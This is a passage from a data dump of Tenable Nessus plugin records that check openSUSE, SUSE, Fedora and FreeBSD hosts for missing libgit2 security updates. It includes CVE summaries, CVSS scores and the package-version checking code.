affected libgit2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-26-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-26-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-26-debuginfo-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-debugsource-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-devel-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libgit2-26-32bit-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libgit2-26-32bit-debuginfo-0.26.6-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2-26 / libgit2-26-debuginfo / libgit2-debugsource / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2022-05-30T17:47:32", "description": "This update for libgit2 to version 0.26.5 fixes the following issues:\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-10887: Fixed an integer overflow which in turn leads to an out of bound read, allowing to read the base object, which could be exploited by an attacker to cause denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading a binary delta file, which could be exploited by an attacker to cause a denial of service (DoS) (bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which could occur with a crafted .gitmodules file (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when processing smart-protocol 'ng' packets (bsc#1104641)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2019-01-02T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : libgit2 (SUSE-SU-2018:2469-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-15501"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libgit2", "p-cpe:/a:novell:suse_linux:libgit2-26-debuginfo", "p-cpe:/a:novell:suse_linux:libgit2-debugsource", "p-cpe:/a:novell:suse_linux:libgit2-devel", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2018-2469-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120086", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2469-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif 
(description)\n{\n script_id(120086);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\", \"CVE-2018-15501\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : libgit2 (SUSE-SU-2018:2469-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for libgit2 to version 0.26.5 fixes the following issues:\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-10887: Fixed an integer overflow which in turn\n leads to an out of bound read, allowing to read the base\n object, which could be exploited by an attacker to cause\n denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading\n a binary delta file, which could be exploited by an\n attacker t ocause a denial of service (DoS)\n (bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which\n could occur with a crafted .gitmodules file\n (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when\n processing smart-protocol 'ng' packets (bsc#1104641)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1100612\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1100613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1104641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10887/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10888/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11235/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-15501/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182469-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?179befed\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Development Tools 15:zypper in -t\npatch SUSE-SLE-Module-Development-Tools-15-2018-1731=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2-26-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-26-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-26-debuginfo-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-debugsource-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-devel-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-26-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-26-debuginfo-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-debugsource-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-devel-0.26.6-3.5.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:31:35", "description": "Update to 0.26.5 
(CVE-2018-10887, CVE-2018-10888)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2018-07-24T00:00:00", "type": "nessus", "title": "Fedora 27 : libgit2 (2018-fb071377ba)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libgit2", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-FB071377BA.NASL", "href": "https://www.tenable.com/plugins/nessus/111250", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-fb071377ba.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111250);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\");\n script_xref(name:\"FEDORA\", value:\"2018-fb071377ba\");\n\n script_name(english:\"Fedora 27 : libgit2 (2018-fb071377ba)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 0.26.5 (CVE-2018-10887, CVE-2018-10888)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-fb071377ba\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"libgit2-0.26.5-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-08-19T12:29:06", "description": "Update to 0.26.5 (CVE-2018-10887, CVE-2018-10888)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : libgit2 (2018-4d253dc945)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libgit2", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-4D253DC945.NASL", "href": "https://www.tenable.com/plugins/nessus/120404", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-4d253dc945.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120404);\n 
script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\");\n script_xref(name:\"FEDORA\", value:\"2018-4d253dc945\");\n\n script_name(english:\"Fedora 28 : libgit2 (2018-4d253dc945)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 0.26.5 (CVE-2018-10887, CVE-2018-10888)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-4d253dc945\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"libgit2-0.26.5-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-10-16T00:53:07", "description": "The Git community reports :\n\nOut-of-bounds reads when reading objects from a packfile", "cvss3": {"score": 8.1, "vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2018-07-12T00:00:00", "type": "nessus", "title": "FreeBSD : Libgit2 -- multiple vulnerabilities (3c9b7698-84da-11e8-8c75-d8cb8abf62dd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:libgit2", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3C9B769884DA11E88C75D8CB8ABF62DD.NASL", "href": "https://www.tenable.com/plugins/nessus/111019", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111019);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/11/10 11:49:46\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\");\n\n script_name(english:\"FreeBSD : Libgit2 -- multiple vulnerabilities (3c9b7698-84da-11e8-8c75-d8cb8abf62dd)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Git community reports :\n\nOut-of-bounds reads when reading objects from a packfile\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/libgit2/libgit2/releases/tag/v0.27.3\"\n );\n # https://vuxml.freebsd.org/freebsd/3c9b7698-84da-11e8-8c75-d8cb8abf62dd.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ae743f25\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:libgit2\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"libgit2<0.27.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-08-19T12:30:52", "description": "This update for libgit2 fixes the following issues :\n\n - CVE-2018-8099: Fixed possible denial of service attack via different vectors by not being able to differentiate between these status codes 